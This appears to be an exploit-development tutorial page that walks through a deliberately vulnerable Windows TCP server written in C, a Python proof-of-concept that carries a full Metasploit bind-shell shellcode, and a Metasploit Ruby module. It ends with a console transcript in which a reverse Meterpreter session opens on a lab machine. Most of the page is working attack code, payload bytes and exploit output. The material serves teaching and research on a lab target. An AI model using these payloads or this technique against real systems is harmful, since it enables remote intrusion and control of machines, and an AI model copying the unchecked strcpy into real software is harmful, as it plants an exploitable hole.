exploit - write metasploit exploit script

Create Vuln Server

Compile the source code with VC6.0 / Dev C++.

#include <iostream.h>
#include <stdio.h>
#include <winsock.h>
#include <windows.h>

//load windows socket
#pragma comment(lib, "wsock32.lib")

//Define Return Messages
#define SS_ERROR 1
#define SS_OK 0

// Deliberately vulnerable sink: the received data is copied into a fixed
// 500-byte stack buffer with strcpy(), which never checks the destination
// size. main() hands it up to 5000 received bytes, so any message longer than
// the buffer writes past buf and over whatever the compiler placed above it on
// the stack -- this is the overflow exploited further down the page. The copy
// is discarded; the function exists only to trigger the bug. A bounded copy
// such as strncpy(buf, str, sizeof(buf) - 1) followed by an explicit NUL
// terminator would close it.
// NOTE(review): strcpy() is used without an explicit #include <string.h>;
// presumably one of the other headers pulls in the declaration -- confirm.
void pr( char *str)
{
   char buf[500]="";
   strcpy(buf,str);
}

// Report a Winsock failure in a message box, then release Winsock.
// Because this already calls WSACleanup(), a caller does not need to call it
// again after sError(); closing any socket the caller opened remains the
// caller's job.
void sError(char *str)
{
   MessageBox (NULL, str, "socket Error" ,MB_OK);
   WSACleanup();
}

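// Minimal single-shot TCP server: accept one client on tcp/9000, read one
// message, hand it to the vulnerable pr() routine and exit.
// Returns SS_OK on success, SS_ERROR after any Winsock failure (the error is
// also shown in a message box).
int main(int argc, char **argv)
{
    WORD sockVersion;
    WSADATA wsaData;
    int rVal;
    // Receive buffer. One byte is held back from recv() so the data handed to
    // pr() is always NUL-terminated; a full 5000-byte read would otherwise let
    // pr()'s strcpy() read past the end of Message.
    char Message[5000]="";

    // server port: 9000
    u_short LocalPort = 9000;

    // wsock32 initialized for usage. WSAStartup() returns non-zero on failure,
    // and WSACleanup() must not be called in that case, so this path reports
    // directly instead of going through sError().
    sockVersion = MAKEWORD(1,1);
    if (WSAStartup(sockVersion, &wsaData) != 0)
    {
        MessageBox(NULL, "Failed WSAStartup()", "socket Error", MB_OK);
        return SS_ERROR;
    }

    //create server socket
    SOCKET serverSocket = socket(AF_INET, SOCK_STREAM, 0);
    if (serverSocket == INVALID_SOCKET)
    {
        sError("Failed socket()");   // sError() performs the WSACleanup()
        return SS_ERROR;
    }

    SOCKADDR_IN sin;
    sin.sin_family = AF_INET;        // address family (same value as PF_INET)
    sin.sin_port = htons(LocalPort);
    sin.sin_addr.s_addr = INADDR_ANY;

    // bind the socket. From here on the listening socket is closed before
    // every error return so the handle does not leak, and WSACleanup() is
    // left to sError() rather than being called a second time.
    rVal = bind(serverSocket, (LPSOCKADDR)&sin, sizeof(sin));
    if (rVal == SOCKET_ERROR)
    {
        closesocket(serverSocket);
        sError("Failed bind()");
        return SS_ERROR;
    }

    //get socket to listen
    rVal = listen(serverSocket, 10);
    if (rVal == SOCKET_ERROR)
    {
        closesocket(serverSocket);
        sError("Failed listen()");
        return SS_ERROR;
    }

    printf("[+] listening on tcp/9000... \n");

    //wait for a single client to connect
    SOCKET clientSocket = accept(serverSocket, NULL, NULL);
    if (clientSocket == INVALID_SOCKET)
    {
        closesocket(serverSocket);
        sError("Failed accept()");
        return SS_ERROR;
    }

    // One read of at most sizeof(Message)-1 bytes. recv() reports a failure
    // as SOCKET_ERROR (-1) and never returns WSAECONNRESET as its result, so
    // the earlier "retry while SOCKET_ERROR" loop spun forever once the peer
    // reset the connection; a failed read now ends the program instead.
    int bytesRecv = recv(clientSocket, Message, sizeof(Message) - 1, 0);
    if (bytesRecv == SOCKET_ERROR)
    {
        closesocket(clientSocket);
        closesocket(serverSocket);
        sError("Failed recv()");
        return SS_ERROR;
    }
    if (bytesRecv == 0)
    {
        printf("\nConnection Closed.\n");
    }
    Message[bytesRecv] = '\0';   // explicit terminator; Message is also zero-filled

    //Pass the data received to the function pr. This is the vulnerable call:
    //pr() copies into a 500-byte stack buffer without checking the length.
    pr(Message);

    //close client socket
    closesocket(clientSocket);

    //close server socket
    closesocket(serverSocket);

    WSACleanup();

    return SS_OK;
}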

Stack Overflow

Exploit vuln-server.exe through its stack overflow bug.

#!/usr/bin/env python
# -*- coding: utf8 -*-

import socket


# Proof-of-concept client for the server above. Written for Python 2, where the
# str literals below are raw byte strings; Python 3's send() would reject them.
csock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# connect_ex() returns 0 on success and an error number instead of raising,
# so the message is only built and sent when the server is actually reachable
ret = csock.connect_ex(("127.0.0.1", 9000))

if (ret == 0):
    # 500 bytes fill pr()'s 500-byte stack buffer exactly
    junk = "A" * 500
    # The next 4 bytes are the return-address overwrite, little-endian. The
    # same value is the 'Ret' of the Metasploit module below and is specific
    # to the author's Windows XP SP3 build.
    eip = "\x7B\x46\x86\x7C"   # 7C86467B

    # bad chars: 00 (pr()'s strcpy() stops copying at the first NUL byte)

    # Encoded payload as emitted by Metasploit; the header lines are the
    # tool's own. Kept byte-for-byte -- any edit breaks the decoder stub.
    # From a defender's view this is a bind shell: the compromised
    # vuln-server.exe would open an unexpected listener on tcp/4444.
    # windows/shell_bind_tcp - 355 bytes
    # http://www.metasploit.com
    # Encoder: x86/shikata_ga_nai
    # VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false, 
    # EXITFUNC=seh, InitialAutoRunScript=, AutoRunScript=
    buf =  "\x90" * 20   # 20 NOPs precede the encoded payload
    buf += "\xba\x09\xb0\x2e\x7e\xdb\xc0\xd9\x74\x24\xf4\x5d\x31"
    buf += "\xc9\xb1\x53\x83\xc5\x04\x31\x55\x0e\x03\x5c\xbe\xcc"
    buf += "\x8b\xa2\x56\x92\x74\x5a\xa7\xf3\xfd\xbf\x96\x33\x99"
    buf += "\xb4\x89\x83\xe9\x98\x25\x6f\xbf\x08\xbd\x1d\x68\x3f"
    buf += "\x76\xab\x4e\x0e\x87\x80\xb3\x11\x0b\xdb\xe7\xf1\x32"
    buf += "\x14\xfa\xf0\x73\x49\xf7\xa0\x2c\x05\xaa\x54\x58\x53"
    buf += "\x77\xdf\x12\x75\xff\x3c\xe2\x74\x2e\x93\x78\x2f\xf0"
    buf += "\x12\xac\x5b\xb9\x0c\xb1\x66\x73\xa7\x01\x1c\x82\x61"
    buf += "\x58\xdd\x29\x4c\x54\x2c\x33\x89\x53\xcf\x46\xe3\xa7"
    buf += "\x72\x51\x30\xd5\xa8\xd4\xa2\x7d\x3a\x4e\x0e\x7f\xef"
    buf += "\x09\xc5\x73\x44\x5d\x81\x97\x5b\xb2\xba\xac\xd0\x35"
    buf += "\x6c\x25\xa2\x11\xa8\x6d\x70\x3b\xe9\xcb\xd7\x44\xe9"
    buf += "\xb3\x88\xe0\x62\x59\xdc\x98\x29\x36\x11\x91\xd1\xc6"
    buf += "\x3d\xa2\xa2\xf4\xe2\x18\x2c\xb5\x6b\x87\xab\xba\x41"
    buf += "\x7f\x23\x45\x6a\x80\x6a\x82\x3e\xd0\x04\x23\x3f\xbb"
    buf += "\xd4\xcc\xea\x56\xdc\x6b\x45\x45\x21\xcb\x35\xc9\x89"
    buf += "\xa4\x5f\xc6\xf6\xd5\x5f\x0c\x9f\x7e\xa2\xaf\x8e\x22"
    buf += "\x2b\x49\xda\xca\x7d\xc1\x72\x29\x5a\xda\xe5\x52\x88"
    buf += "\x72\x81\x1b\xda\x45\xae\x9b\xc8\xe1\x38\x10\x1f\x36"
    buf += "\x59\x27\x0a\x1e\x0e\xb0\xc0\xcf\x7d\x20\xd4\xc5\x15"
    buf += "\xc1\x47\x82\xe5\x8c\x7b\x1d\xb2\xd9\x4a\x54\x56\xf4"
    buf += "\xf5\xce\x44\x05\x63\x28\xcc\xd2\x50\xb7\xcd\x97\xed"
    buf += "\x93\xdd\x61\xed\x9f\x89\x3d\xb8\x49\x67\xf8\x12\x38"
    buf += "\xd1\x52\xc8\x92\xb5\x23\x22\x25\xc3\x2b\x6f\xd3\x2b"
    buf += "\x9d\xc6\xa2\x54\x12\x8f\x22\x2d\x4e\x2f\xcc\xe4\xca"
    buf += "\x51\x3c\x34\xc7\xc6\xe7\xad\xaa\x8a\x17\x18\xe8\xb2"
    buf += "\x9b\xa8\x91\x40\x83\xd9\x94\x0d\x03\x32\xe5\x1e\xe6"
    buf += "\x34\x5a\x1e\x23"
    # Trailing padding. The whole message is 500 + 4 + 375 + 1500 = 2379
    # bytes, well under the 5000 bytes the server's recv() accepts.
    nops = "\x90" * 1500

    payload = junk + eip + buf + nops 

    csock.send(payload)

csock.close()

Write MSF exploit script

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

# Metasploit module for the custom vuln-server above. It sends one TCP message
# laid out as <'Offset' bytes of filler><return address><encoded payload>, the
# same shape as the Python proof of concept. A single hard-coded target is
# defined; its 'Ret' address is tied to the author's Windows XP SP3 build and
# would have to be rediscovered for any other system.
class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp
  # Only generate_seh_record is taken from the SEH mixin. With
  # 'Offset' => 496 its 4-byte jump stub brings the filler to 500 bytes, so the
  # address that follows sits where the Python PoC places `eip`. The server
  # overwrites a saved return address, not an SEH chain, so the stub itself is
  # never executed.
  include Msf::Exploit::Remote::Seh


  # Module metadata. 'Space' bounds the encoded payload, and 'BadChars' adds
  # 0xFF to the 0x00 the PoC lists (pr()'s strcpy stops at the first NUL).
  # NOTE(review): 'DefaultOptions' asks for EXITFUNC=process, but the console
  # transcript below reports EXITFUNC=seh, so that default does not appear to
  # have taken effect in that run -- verify against the payload's own defaults.
  def initialize(info={})
    super(update_info(info,
      'Name'            =>  'Custom Vulnable Tcp Server Buffer Overflow',
      'Description'     =>  %q{
          'This module exploits a custom windows tcp server'
      },
      'Author'          =>  [ 'Nixawk' ],
      'License'         =>  MSF_LICENSE,
      'DefaultOptions'  =>  {
                                'EXITFUNC'       => 'process',
                                'AllowWin32SEH'  => true
                            },
      'Payload'         =>  {
        'Space'            => 1400,
        'BadChars'         => "\x00\xFF",
        'StackAdjustment'  => -3500
      },
      'Platform'      => 'win',
      'Targets'       =>
        [
          # 'Offset' is the filler length before the jump stub; 'Ret' is the
          # same 0x7C86467B the Python PoC hard-codes as `eip`.
          ['Windows XP SP3 En', {'Ret' => 0x7C86467B, 'Offset' => 496}]
        ],

      'Privileged'     => false,
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'June 20 2015'
    ))

    # the server listens on tcp/9000, so override the mixin's default RPORT
    register_options([Opt::RPORT(9000)], self.class)

    end

    # Build and send the single message. The author's earlier debugging note
    # is kept for reference; the transcript below shows this version running
    # successfully:
    # [*] Started reverse handler on 192.168.1.108:4444 
    # [-] Exploit failed: TypeError no implicit conversion of String into Integer
    def exploit
        connect

        sploit = rand_text(target['Offset'])      # 496 bytes of random filler
        sploit << generate_seh_record(target.ret) # jump stub + 'Ret' address
        # sploit << make_nops(50) 
        sploit << payload.encoded                 # bounded by 'Space' / 'BadChars'

        sock.put(sploit)

        handler
        disconnect
    end
end

Exploit Vuln Server with MSF

msf exploit(custom_vulnserver) > show options

Module options (exploit/windows/misc/custom_vulnserver):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.1.105    yes       The target address
   RPORT  9000             yes       The target port


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  seh              yes       Exit technique (Accepted: , , seh, thread, process, none)
   LHOST     192.168.1.108    yes       The listen address
   LPORT     8080             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows XP SP3 En


msf exploit(custom_vulnserver) > exploit

[*] Started reverse handler on 192.168.1.108:8080 
[*] Sending stage (884270 bytes) to 192.168.1.105
[*] Meterpreter session 2 opened (192.168.1.108:8080 -> 192.168.1.105:1557) at 2015-06-22 11:16:47 +0000

meterpreter > sysinfo
Computer        : CORELAN-LAB
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : zh_CN
Domain          : MSHOME
Logged On Users : 2
Meterpreter     : x86/win32
meterpreter > 

References

https://www.corelan.be/index.php/2009/08/12/exploit-writing-tutorials-part-4-from-exploit-to-metasploit-the-basics/
